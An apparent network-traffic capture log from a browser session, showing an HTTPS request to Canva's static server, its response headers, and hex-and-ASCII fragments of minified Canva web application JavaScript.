                                                                                                                                                                                                                                                                    x-amz-version-id: .xltkql28Zgojf6jkFzo7TDyKRALSsN7
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 48 57 53 52 37 31 79 75 58 6c 32 50 68 63 4b 56 49 4f 74 44 55 44 56 78 61 70 41 25 32 46 32 78 63 42 31 66 6f 73 78 33 72 45 51 72 50 4e 4e 6f 31 54 64 54 6c 42 4c 42 32 25 32 42 39 6d 4f 66 52 73 63 35 7a 64 32 56 50 64 58 48 43 44 74 65 58 76 31 62 72 4b 68 76 69 33 68 64 66 36 5a 50 77 25 32 42 52 49 69 36 69 41 56 33 75 36 37 76 42 38 67 52 6f 50 79 57 6c 54 51 65 50 39 4d 59 39 51 6c 49 42 4c 6f 63 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HWSR71yuXl2PhcKVIOtDUDVxapA%2F2xcB1fosx3rEQrPNNo1TdTlBLB2%2B9mOfRsc5zd2VPdXHCDteXv1brKhvi3hdf6ZPw%2BRIi6iAV3u67vB8gRoPyWlTQeP9MY9QlIBLocg%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1199INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 34 36 34 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 36 39 34 31 37 33 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[4464],{/***/ 694173:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 70 61 64 53 74 61 72 74 28 34 2c 22 30 22 29 7d 2d 24 7b 5f 5f 63 2e 63 42 28 62 29 7d 2d 24 7b 5f 5f 63 2e 63 42 28 63 29 7d 60 7d 3b 5f 5f 63 2e 67 42 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5f 5f 63 2e 65 42 28 61 29 3b 72 65 74 75 72 6e 7b 79 65 61 72 3a 61 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 2c 6d 6f 6e 74 68 3a 61 2e 67 65 74 4d 6f 6e 74 68 28 29 2b 31 2c 64 61 79 3a 61 2e 67 65 74 44 61 74 65 28 29 2c 61 48 3a 61 2e 67 65 74 48 6f 75 72 73 28 29 2c 79 35 3a 61 2e 67 65 74 4d 69 6e 75 74 65 73 28 29 7d 7d 3b 0a 68 42 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 28 7b 73 69 7a 65 3a 62 7d 29 3d 3e 4d 51 61 28 22 69 6d 67 22 2c 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 61 2e 74 75 2c 63 6c 61 73 73 4e 61 6d 65 3a 4e 51 61 28 22
                                                                                                                                                                                                                                                                    Data Ascii: padStart(4,"0")}-${__c.cB(b)}-${__c.cB(c)}`};__c.gB=function(a){a=__c.eB(a);return{year:a.getFullYear(),month:a.getMonth()+1,day:a.getDate(),aH:a.getHours(),y5:a.getMinutes()}};hB=function(a){return({size:b})=>MQa("img",{"aria-label":a.tu,className:NQa("
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 29 3b 5f 5f 63 2e 6e 42 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 29 7b 74 68 69 73 2e 65 62 3d 61 3b 74 68 69 73 2e 6e 61 3d 62 26 26 62 2e 55 6b 28 22 63 6c 6f 73 65 64 5f 63 61 70 74 69 6f 6e 5f 61 70 69 2e 68 74 74 70 5f 63 6c 69 65 6e 74 22 29 7d 7d 3b 5f 5f 63 2e 6e 42 2e 70 72 6f 74 6f 74 79 70 65 2e 55 56 3d 63 61 28 37 37 29 3b 5f 5f 63 2e 6e 42 2e 70 72 6f 74 6f 74 79 70 65 2e 79 4c 3d 63 61 28 37 35 29 3b 5f 5f 63 2e 6e 42 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 4b 3d 63 61 28 37 33 29 3b 76 61 72 20 61 52 61 3d 7b 7d 3b 61 52 61 2e 24 34 61 3d 5f 5f 63 2e 6e 42 3b 5f 5f 63 2e 6f 42 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 29 7b 74 68 69 73 2e 65 62 3d 61 3b 74 68 69 73 2e 57 61 3d 62 3b 74 68 69 73
                                                                                                                                                                                                                                                                    Data Ascii: );__c.nB=class{constructor(a,b){this.eb=a;this.na=b&&b.Uk("closed_caption_api.http_client")}};__c.nB.prototype.UV=ca(77);__c.nB.prototype.yL=ca(75);__c.nB.prototype.JK=ca(73);var aRa={};aRa.$4a=__c.nB;__c.oB=class{constructor(a,b){this.eb=a;this.Wa=b;this
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 68 52 61 3d 28 66 52 61 2e 67 65 74 54 69 6d 65 28 29 2b 5f 5f 63 2e 75 42 29 2f 38 36 34 45 35 3b 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 74 79 70 65 3a 37 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 29 3b 76 61 72 20 4f 51 61 3d 7b 62 61 73 65 55 6e 69 74 3a 22 38 70 78 22 2c 73 70 61 63 65 31 35 30 3a 22 31 32 70 78 22 2c 78 73 6d 61 6c 6c 53 69 7a 65 3a 22 31 32 70 78 22 2c 73 6d 61 6c 6c 53 69 7a 65 3a 22 31 36 70 78 22 2c 73 6d 61 6c 6c 4d 65 64 69 75 6d 53 69 7a 65 3a 22 31 38 70 78 22 2c 6d 65 64 69 75 6d 53 69 7a 65 3a 22 32 34 70 78 22 2c 6c 61 72 67 65 53 69 7a 65 3a 22 33 32 70 78 22 2c 72 6f 6f 74 3a 22 79 67 47 4b 54 51 22 2c 78 73 6d 61 6c 6c 3a 22 5f 36 31 56 52 71 51 22 2c 73 6d 61 6c 6c 3a 22 61 62 75 6c 62 67 22 2c 73 6d 61 6c 6c 4d
                                                                                                                                                                                                                                                                    Data Ascii: hRa=(fRa.getTime()+__c.uB)/864E5;Object.freeze({type:7,value:void 0});var OQa={baseUnit:"8px",space150:"12px",xsmallSize:"12px",smallSize:"16px",smallMediumSize:"18px",mediumSize:"24px",largeSize:"32px",root:"ygGKTQ",xsmall:"_61VRqQ",small:"abulbg",smallM
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC155INData Raw: 29 20 3d 3e 20 72 28 36 39 34 31 37 33 29 2c 0a 0a 2f 2a 2a 2a 2f 20 32 33 36 37 32 38 3a 0a 28 5f 2c 20 5f 5f 2c 20 72 29 20 3d 3e 20 72 28 36 39 34 31 37 33 29 2c 0a 0a 2f 2a 2a 2a 2f 20 36 34 38 37 38 39 3a 0a 28 5f 2c 20 5f 5f 2c 20 72 29 20 3d 3e 20 72 28 36 39 34 31 37 33 29 0a 0a 7d 5d 29 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 6f 75 72 63 65 6d 61 70 73 2f 31 30 37 62 62 63 64 31 36 37 36 63 31 39 34 63 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                                    Data Ascii: ) => r(694173),/***/ 236728:(_, __, r) => r(694173),/***/ 648789:(_, __, r) => r(694173)}])//# sourceMappingURL=sourcemaps/107bbcd1676c194c.js.map


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    62192.168.2.1249783104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC787OUTGET /web/c40487ebdc5035af.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1191INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:41 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 124787
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951167a58c402-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49981
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "3bd2ea7d8bf4c20b72f4cee9429ca81d"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:27 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:22 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: mTGYbgF2CLzmp+gw2XCzWTsDO9/joqGsbmQjfz8QOgrlGMPeYzEKgF54vW5aw0/bSm8E3n3MVnU=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8TFT113DD0Q7S1
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 2PO1XmOg68yR.WuvT8wKTATIIYgLjcqZ
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 44 67 4b 43 78 47 6c 59 35 50 25 32 42 70 4e 62 4d 68 42 36 7a 32 6c 46 78 33 25 32 42 30 6f 62 71 77 71 52 57 64 42 4b 53 33 53 74 31 6e 78 64 6a 6a 51 73 71 5a 47 63 46 69 54 50 71 55 37 65 66 71 61 4b 6b 61 75 68 51 78 56 34 6b 42 51 59 4c 71 71 44 43 6c 6e 70 75 6e 25 32 46 65 6c 7a 76 65 5a 67 69 58 48 65 35 79 52 63 61 4b 48 6c 77 69 72 53 44 30 5a 59 4c 64 75 73 5a 70 71 64 42 30 5a 44 67 35 6f 61 38 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DgKCxGlY5P%2BpNbMhB6z2lFx3%2B0obqwqRWdBKS3St1nxdjjQsqZGcFiTPqU7efqaKkauhQxV4kBQYLqqDClnpun%2FelzveZgiXHe5yRcaKHlwirSD0ZYLdusZpqdB0ZDg5oa8%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 30 33 37 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 31 34 34 35 38 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6037],{/***/ 214458:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 42 3d 5f 5f 63 2e 42 3b 76 61 72 20 76 64 3d 5f 5f 63 2e 76 64 3b 76 61 72 20 7a 64 3d 5f 5f 63 2e 7a 64 3b 76 61 72 20 56 69 3d 5f 5f 63 2e 56 69 3b 76 61 72 20 59 68 3d 5f 5f 63 2e 59 68 3b 76 61 72 20 6c 6a 3d 5f 5f 63 2e 6c 6a 3b 76 61 72 20 48 6e 3d 5f 5f 63 2e 48 6e 3b 76 61 72 20 4f 3d 5f 5f 63 2e 4f 3b 76 61 72 20 4c 57 3d 5f 5f 63 2e 4c 57 3b 76 61 72 20 4e 68 3d 5f 5f 63 2e 4e 68 3b 76 61 72 20 62 7a 3d 5f 5f 63 2e 62 7a 3b 76 61 72 20 64 7a 3d 5f 5f 63 2e 64 7a 3b 76 61 72 20 41 3d 5f 5f 63 2e 41 3b 0a 76 61 72 20 55 34 63 2c 56 34 63 2c 57 34 63 2c 59 34 63 2c 5a 34 63 2c 6d 24 2c 24 34 63 2c 61 35 63 2c 62 35 63 2c 58 34 63 2c 63 35 63 2c 68 35 63 2c 6e 24 2c 64 35 63 2c 65 35 63 2c 66 35 63 2c 69 35 63 2c 6a 35 63 2c 6b 35 63 2c 6d 35 63 2c
                                                                                                                                                                                                                                                                    Data Ascii: B=__c.B;var vd=__c.vd;var zd=__c.zd;var Vi=__c.Vi;var Yh=__c.Yh;var lj=__c.lj;var Hn=__c.Hn;var O=__c.O;var LW=__c.LW;var Nh=__c.Nh;var bz=__c.bz;var dz=__c.dz;var A=__c.A;var U4c,V4c,W4c,Y4c,Z4c,m$,$4c,a5c,b5c,X4c,c5c,h5c,n$,d5c,e5c,f5c,i5c,j5c,k5c,m5c,
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 3d 3d 28 64 3d 61 2e 48 68 61 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 6f 76 28 28 29 3d 3e 7b 7d 29 3b 63 6f 6e 73 74 20 65 3d 5f 5f 63 2e 73 4d 28 7b 4b 61 3a 62 2c 62 61 3a 63 7d 29 2c 66 3d 61 2e 71 6e 2e 66 69 6c 74 65 72 28 67 3d 3e 67 2e 4b 61 3c 65 26 26 5f 5f 63 2e 73 4d 28 67 29 3e 62 29 3b 61 2e 47 68 61 3d 28 30 2c 5f 5f 63 2e 4b 4f 29 28 28 29 3d 3e 21 21 61 2e 48 6f 2e 63 6f 6e 74 65 78 74 26 26 66 2e 65 76 65 72 79 28 67 3d 3e 21 67 2e 6c 6f 61 64 69 6e 67 29 2c 28 29 3d 3e 7b 66 6f 72 28 63 6f 6e 73 74 20 67 20 6f 66 20 66 29 7b 67 2e 4b 61 3e 3d 62 26 26 67 2e 4b 61 3c 65 26 26 67 2e 51 45 28 29 3b 63 6f 6e 73 74 20 68 3d 32 3d 3d 3d 67 2e 74 72 61 63 6b 2e 6c 6f 6f 70 3b 61 2e 73 6a 2e 70 6c 61 79 28 67 2c 7b
                                                                                                                                                                                                                                                                    Data Ascii: ==(d=a.Hha)||void 0===d?void 0:d.ov(()=>{});const e=__c.sM({Ka:b,ba:c}),f=a.qn.filter(g=>g.Ka<e&&__c.sM(g)>b);a.Gha=(0,__c.KO)(()=>!!a.Ho.context&&f.every(g=>!g.loading),()=>{for(const g of f){g.Ka>=b&&g.Ka<e&&g.QE();const h=2===g.track.loop;a.sj.play(g,{
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 65 66 7d 3b 72 65 74 75 72 6e 20 64 7a 28 5f 5f 63 2e 52 58 28 22 72 65 70 6f 72 74 2d 63 6f 6e 74 65 6e 74 22 2c 7b 61 70 70 3a 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 61 70 70 4e 61 6d 65 2c 63 6f 6e 74 65 6e 74 5f 69 64 3a 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 63 6f 6e 74 65 6e 74 49 64 2c 6c 69 6e 6b 3a 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 6c 69 6e 6b 2c 73 6f 75 72 63 65 3a 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 73 6f 75 72 63 65 2c 72 65 76 69 65 77 5f 69 74 65 6d 5f 74 79 70 65 3a 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76
                                                                                                                                                                                                                                                                    Data Ascii: ef};return dz(__c.RX("report-content",{app:null===a||void 0===a?void 0:a.appName,content_id:null===a||void 0===a?void 0:a.contentId,link:null===a||void 0===a?void 0:a.link,source:null===a||void 0===a?void 0:a.source,review_item_type:null===a||void 0===a?v
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 28 29 3d 3e 7b 61 2e 4d 2e 74 72 61 63 6b 28 67 35 63 2c 6d 29 7d 29 3a 61 2e 4d 2e 74 72 61 63 6b 28 67 35 63 2c 6d 29 7d 7d 7d 3b 0a 6e 24 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6e 6e 65 63 74 69 6f 6e 3b 76 61 72 20 62 3d 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 65 66 66 65 63 74 69 76 65 54 79 70 65 3b 62 3d 62 26 26 5b 22 73 6c 6f 77 2d 32 67 22 2c 22 32 67 22 2c 22 33 67 22 2c 22 34 67 22 2c 22 75 6e 6b 6e 6f 77 6e 22 5d 2e 69 6e 63 6c 75 64 65 73 28 62 29 3f 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 65 66 66 65 63 74 69 76 65 54 79 70 65 3a 22 75 6e 6b 6e 6f 77 6e 22 3b 76 61 72 20 63 3d 6e 75 6c 6c 3d 3d
                                                                                                                                                                                                                                                                    Data Ascii: ()=>{a.M.track(g5c,m)}):a.M.track(g5c,m)}}};n$=function(a){a=a.navigator.connection;var b=null===a||void 0===a?void 0:a.effectiveType;b=b&&["slow-2g","2g","3g","4g","unknown"].includes(b)?null===a||void 0===a?void 0:a.effectiveType:"unknown";var c=null==
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 61 78 54 6f 75 63 68 50 6f 69 6e 74 73 3a 62 7d 29 7b 72 65 74 75 72 6e 21 5f 5f 63 2e 6d 4d 62 28 61 29 7c 7c 2f 69 70 68 6f 6e 65 7c 69 70 61 64 2f 69 2e 74 65 73 74 28 61 29 3f 21 31 3a 31 3e 3d 62 7d 3b 0a 6b 35 63 3d 66 75 6e 63 74 69 6f 6e 28 7b 4d 3a 61 2c 57 61 3a 62 2c 64 77 62 3a 63 3d 2e 30 31 2c 65 77 62 3a 64 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 7d 29 7b 69 66 28 21 28 63 3c 64 28 29 29 29 72 65 74 75 72 6e 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6d 65 28 34 31 34 39 31 29 2e 74 68 65 6e 28 28 29 3d 3e 5f 5f 63 2e 53 5a 63 29 2e 74 68 65 6e 28 28 7b 4c 36 61 3a 65 7d 29 3d 3e 6e 65 77 20 65 28 61 2c 62 2e 55 6b 28 22 72 65 6e 64 65 72 69 6e 67 2e 76 69 64 65 6f 5f 6c 6f 61 64 22 29 29 29 7d 3b 6d 35 63 3d 66 75 6e 63 74
                                                                                                                                                                                                                                                                    Data Ascii: axTouchPoints:b}){return!__c.mMb(a)||/iphone|ipad/i.test(a)?!1:1>=b};k5c=function({M:a,Wa:b,dwb:c=.01,ewb:d=Math.random}){if(!(c<d()))return __webpack_require__.me(41491).then(()=>__c.SZc).then(({L6a:e})=>new e(a,b.Uk("rendering.video_load")))};m5c=funct
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 6c 6c 65 72 20 74 68 61 6e 20 74 68 69 73 20 62 6f 78 3a 20 7b 7d 20 3e 20 7b 7d 22 2c 6b 2d 68 2c 62 2e 68 65 69 67 68 74 2b 32 45 2d 31 30 29 3b 61 3d 62 2e 74 72 61 6e 73 66 6f 72 6d 28 63 2e 74 68 65 6e 28 5f 5f 63 2e 64 41 2e 74 72 61 6e 73 6c 61 74 65 28 4d 61 74 68 2e 6d 69 6e 28 65 2c 30 29 2b 4d 61 74 68 2e 6d 61 78 28 67 2d 62 2e 77 69 64 74 68 2c 30 29 2c 4d 61 74 68 2e 6d 69 6e 28 68 2c 30 29 2b 4d 61 74 68 2e 6d 61 78 28 6b 2d 62 2e 68 65 69 67 68 74 2c 30 29 29 29 2e 74 68 65 6e 28 61 29 29 7d 65 6c 73 65 20 61 3d 62 3b 72 65 74 75 72 6e 7b 4b 6a 3a 61 2e 63 65 6e 74 65 72 28 29 2c 7a 6f 6f 6d 3a 61 2e 77 69 64 74 68 2f 64 7d 7d 3b 0a 75 35 63 3d 66 75 6e 63 74 69 6f 6e 28 7b 79 63 62 3a 61 2c 6d 69 6e 5a 6f 6f 6d 3a 62 2c 6d 61 78 5a 6f 6f
                                                                                                                                                                                                                                                                    Data Ascii: ller than this box: {} > {}",k-h,b.height+2E-10);a=b.transform(c.then(__c.dA.translate(Math.min(e,0)+Math.max(g-b.width,0),Math.min(h,0)+Math.max(k-b.height,0))).then(a))}else a=b;return{Kj:a.center(),zoom:a.width/d}};u5c=function({ycb:a,minZoom:b,maxZoo
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 74 69 28 28 6b 2c 6c 2c 6d 29 3d 3e 7b 64 28 6b 29 3b 6e 75 6c 6c 3d 3d 3d 6d 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 76 6f 69 64 20 30 3a 6d 28 6e 75 6c 6c 3d 3d 3d 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 29 7d 2c 31 30 30 2c 7b 6c 65 61 64 69 6e 67 3a 21 31 7d 29 3b 63 3d 6f 24 28 66 75 6e 63 74 69 6f 6e 28 7b 56 55 3a 6b 2c 61 61 3a 6c 2c 63 68 69 6c 64 72 65 6e 3a 6d 2c 68 59 62 3a 6e 7d 29 7b 63 6f 6e 73 74 20 70 3d 65 2e 57 76 2c 71 3d 65 2e 71 49 2c 72 3d 65 2e 4c 57 61 2c 75 3d 65 2e 62 33 61 2c 76 3d 7a 3d 3e 6e 65 77 20 48 6e 28 7a 2e 78 2a 6c 2e 77 69 64 74 68 2c 7a 2e 79 2a 6c 2e 68 65 69 67 68 74 29 2c 78 3d 74 24 28 28 29 3d 3e 7b 69 66 28 65 2e
                                                                                                                                                                                                                                                                    Data Ascii: ti((k,l,m)=>{d(k);null===m||void 0===m?void 0:m(null===l||void 0===l?void 0:l.getBoundingClientRect())},100,{leading:!1});c=o$(function({VU:k,aa:l,children:m,hYb:n}){const p=e.Wv,q=e.qI,r=e.LWa,u=e.b3a,v=z=>new Hn(z.x*l.width,z.y*l.height),x=t$(()=>{if(e.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 4d 61 3a 62 7d 29 7b 63 6f 6e 73 74 20 7b 6d 63 62 3a 63 2c 48 6d 62 3a 64 2c 75 6d 61 3a 65 2c 67 70 3a 66 2c 73 65 74 75 70 3a 67 7d 3d 43 35 63 28 7b 51 64 3a 61 2c 45 69 62 3a 28 29 3d 3e 62 2e 59 61 2c 51 53 3a 21 30 7d 29 3b 61 3d 63 28 29 3b 63 6f 6e 73 74 20 7b 59 50 3a 68 2c 6c 4f 3a 6b 7d 3d 71 35 63 28 7b 66 6e 61 3a 61 7d 29 3b 61 3d 64 2e 6d 61 70 28 28 5b 6c 2c 6d 5d 29 3d 3e 28 7b 59 57 3a 6c 2c 63 61 6c 6c 62 61 63 6b 3a 6d 7d 29 29 3b 72 65 74 75 72 6e 7b 59 50 3a 68 2c 75 6d 61 3a 65 2c 67 70 3a 7b 67 65 74 20 71 49 28 29 7b 72 65 74 75 72 6e 20 66 2e 71 49 7d 7d 2c 47 42 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 28 29 7d 2c 56 45 3a 61 2c 6c 4f 3a 6b 7d 7d 3b 0a 45 35 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72
